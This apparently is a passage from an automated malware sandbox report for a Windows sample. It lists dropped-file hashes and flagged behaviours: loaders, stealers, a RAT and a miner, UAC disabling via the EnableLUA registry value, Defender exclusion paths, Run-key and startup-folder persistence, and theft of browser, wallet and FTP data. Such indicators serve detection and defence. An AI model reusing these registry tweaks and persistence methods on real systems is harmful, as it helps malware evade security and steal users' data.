SHA512 2ccc8f7d22c3d15881d2276f14d8c2b6cd2e391f6f0ab47ce7f4ea44ebe1a95a07e58b84634d32edb210aa6efd709b97bd0dcff222fc6c5822b829e22ac8c213

C:\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 009603a0104bf07163f1c6139ac16a59
SHA1 10be7b8a4611a042dcda9045fcf883cfc90b7fe9
SHA256 2a053abba3d8e1563d7ab9e4ad49dc65e5870ecf804584d7195e1fd7eae01bc0
SHA512 a21f4df5ad07054de75416cbdfee90af45319bbd95a1bc99c672efdaaa3176ba946c06b2f42a1d8798edda50e77f75afbec0d672572a9dff9fb51596d33188ad

\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 c23ae6e28c3935ae7de4657753d3edbe
SHA1 096623b57ebb336e4e24200fa93106842658e451
SHA256 7ad079fff988f59e73ff27db95ea1804873bb93f9e9a89f9878bb3b9b90c3e52
SHA512 9e19d3e4ecb441e3dccb5773d7504aba3c2dc7a5fd4b35cbd157747e4f32e94f183bdf3fcd4f5e20bf79ea9c08fa8686a3da9acb7b47f7e714ddb6ee6aa1b845

\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 1fda35506b7a6c1ab5a016daf4e04139
SHA1 4e58119941cb8717e27b13890bc05a23f9a30492
SHA256 8306bea0eb43d3dd303ed0e5f4c7444e605774d3001bc35f8330422477b5e29b
SHA512 93daf83ad09a170e16cb775420ab11b1512cf8faeb99fbc10f599f3acfe7f8c45d9c71c52bc7057e647f038f6134f9f718be3a714b81c70d8c2edda93434a4f4

\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 fe173c9bc6024a9ae1d9929cb2b42505
SHA1 8562210af4402e1dceb87a412cc852a52839f90e
SHA256 eda131033cd55d566ed96279c8e0540a385b4022879675527ca940d80deebeb6
SHA512 a7ad93be6ca558d79ae4362d7a7fceae5a59128cbb8e0bbd18f0074384e1b47b83d0a6947f0ee9d0c81de7c4ef7a1ef269a31e7b56560e4fb935f7e97ec3ad59

C:\Users\Admin\AppData\Local\Temp\7zS3ABF.tmp\Install.exe

MD5 e895cd3c15b7536f0d2b1c7b79f81222
SHA1 82b772cd4db6b767239dab863cdab70bd35aa064
SHA256 8ebd38a158c4c824f3798c3b75620a7d0eef69b91f757662f4a4f6481e918a1b
SHA512 e05006969a997430d11c1285e29e48ccd52b972d11fd86f44632a7902503644067edd05e6a7a8f4850763e338b9728c477c7048d9ab63fd1e9651fc25edb1319

\ProgramData\nss3.dll

MD5 7b7f0a10b1a4a80dc48841a826bd0ea6
SHA1 a5ec81941e7f3194964505759f3988521c66568c
SHA256 659f716d08a416f1091664f7264caf55652a7ca86abf9d53295a98b0f72f54e0
SHA512 2933f667861e17667e122481598dff52054afb3da85e0557666d6b60388e8f3de025a64e3cd740031c1656c76a1832f89d9139fcfac246c6064b28779cd2a207

\ProgramData\mozglue.dll

MD5 808187ecda753649e06cc1b8eb3f08ff
SHA1 b4928c1082a7c2bf994640112cd1a1775ed53f09
SHA256 c734c3b473d9e34f830a694ffed13612c256450a2a4bb7497dd9c7cc96fb7fb3
SHA512 9a9d7bf955a441fe5bb779403e0e1f144215aa620c8b50f3dd48e350f8718bfb62144a39827b31333db9ab4fcccbc74b3f9aaf4a430cf781fd3f1bf86c530be0

memory/1576-597-0x00000000007C0000-0x00000000007E0000-memory.dmp

memory/1552-596-0x0000000000400000-0x00000000005AA000-memory.dmp

memory/1576-598-0x0000000000BD0000-0x0000000000BF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4D55.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

memory/1316-628-0x00000000007E0000-0x00000000008E0000-memory.dmp

\Users\Admin\AppData\Local\Temp\DHCFIDAKJD.exe

MD5 634689da3c5d52294c61ed157dad45ef
SHA1 5f2d059addbcfffc07a51fee3c320395251b927c
SHA256 bb61bda60bdf02c3d432ff5ce7d46bfbcd8a203fd19cc21670422b02a708930c
SHA512 a06eb7027c96318cf1cafee13ee770cae45281962a7252383203f79505318ebf6dda06f0eea4a7df5bd8824175992c3a12a7ec8ecbccdde941c082c26aaceda8

C:\Users\Admin\AppData\Local\Temp\8C78.exe

MD5 ae597691370226cc4354b9897415b115
SHA1 3e89b4b1d81cdae205ac96f151bf3dc0fe3337ae
SHA256 10f5ba78f4d86b82127e167fee1ea0e6b26dd087ecfe933bda24e5d2685ad675
SHA512 f2db423695272ea3519d6329965baf4f0eee6dda62820406ecafcc13385380cb6279c097a8a610163835a181f845ccac7982c7f867b90abc5b553968b3ac7f24

C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\RRZnTnn.exe

MD5 37ee8ae952e7329a17778e42e82e4aa4
SHA1 58361de906707372eb165a8e40c3db1c87e1258f
SHA256 2934cd388c6ecbd34ca20d76ec4a8823a904bb748551368260e5b3613f69cb5e
SHA512 48c223f151af2a5949ad66b79da28e8550b07155b002e31ac7af566ae287d06dfcf5b5baa83e9c77c850aedda96c9c18e757db4c8d31f62e744992cf1eb1b0a7

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-15 02:01

Reported

2024-03-15 02:03

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe"

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4WujRaZGRrpshjaTNeyFxoy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUo7DmsI28Drtz3mNGD5uOAu.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oGaKBCTfWiLMwW1zKMcIP3rc.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v9CupCzEBDEI1PrvrnKsTxy1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QBUMczUi2Pf941DefaINrAvS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TI15w0gLkpZoqvO6wRGoe3gP.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IKiCs9k3lloeS5vcLyYa2j1X.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yjE7yT7UVOSceR9MaY75fPuX.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Lumma Stealer

stealer lumma

SmokeLoader

trojan backdoor smokeloader

Socks5Systemz

botnet socks5systemz

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

xmrig

miner xmrig

Detect binaries embedding considerable number of MFA browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect binaries embedding considerable number of cryptocurrency wallet browser extension IDs.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables (downlaoders) containing URLs to raw contents of a paste

Description Indicator Process Target
N/A N/A N/A N/A

Detects executables packed with VMProtect.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects executables packed with or use KoiVM

Description Indicator Process Target
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Creates new service(s)

persistence

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe N/A
File created C:\Windows\system32\drivers\etc\hosts C:\ProgramData\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yjE7yT7UVOSceR9MaY75fPuX.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QBUMczUi2Pf941DefaINrAvS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TI15w0gLkpZoqvO6wRGoe3gP.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TUo7DmsI28Drtz3mNGD5uOAu.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oGaKBCTfWiLMwW1zKMcIP3rc.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IKiCs9k3lloeS5vcLyYa2j1X.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v9CupCzEBDEI1PrvrnKsTxy1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\u4WujRaZGRrpshjaTNeyFxoy.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\IglGrnQY4KjxY4ESkNLr1P49.exe N/A
N/A N/A C:\Users\Admin\Pictures\YcZF7SNXvFMc37DYXI3ziUaW.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7K59T.tmp\IglGrnQY4KjxY4ESkNLr1P49.tmp N/A
N/A N/A C:\Users\Admin\Pictures\MjaQmNnsQNMq8m3PWjNhbwcJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\syncUpd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Lina Text\linatext.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Lina Text\linatext.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe N/A
N/A N/A C:\Users\Admin\Pictures\HaHE4yGhKaVOdJY4tH9U0wE2.exe N/A
N/A N/A C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe N/A
N/A N/A C:\Users\Admin\Pictures\POWMHemIAdhWqbG9WwO5wEor.exe N/A
N/A N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
N/A N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS86E3.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
N/A N/A C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A
N/A N/A C:\ProgramData\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\33945c4f34\Dctooux.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403150201431\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\313E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1346.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe N/A
N/A N/A C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads local data of messenger clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 91.211.247.248 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ledger-Live Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\GDGIJECGDG.exe" C:\Users\Admin\AppData\Local\Temp\GDGIJECGDG.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\a0e81e80-45cc-4456-972b-e9d648d8e4bd\\1346.exe\" --AutoStart" C:\Users\Admin\AppData\Local\Temp\1346.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\08b8633507bbabd427439f1fb9ce13335c1eb082aa9f9d02b3331020e854a856.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\UzSZFMWFpthvMvdZfvnxrxs2.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zS8CBF.tmp\Install.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\Pictures\mqJpRwpbfK974CI6kSx5DDx3.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\VcIJRFpHiPTKASLFH\cTmyoaxliqPIUed\BZzGTBs.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\Google\Chrome\updater.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\SafQccDpCMVtGOrp\FCArjAYIXswMLcN\RPDIbPb.exe N/A
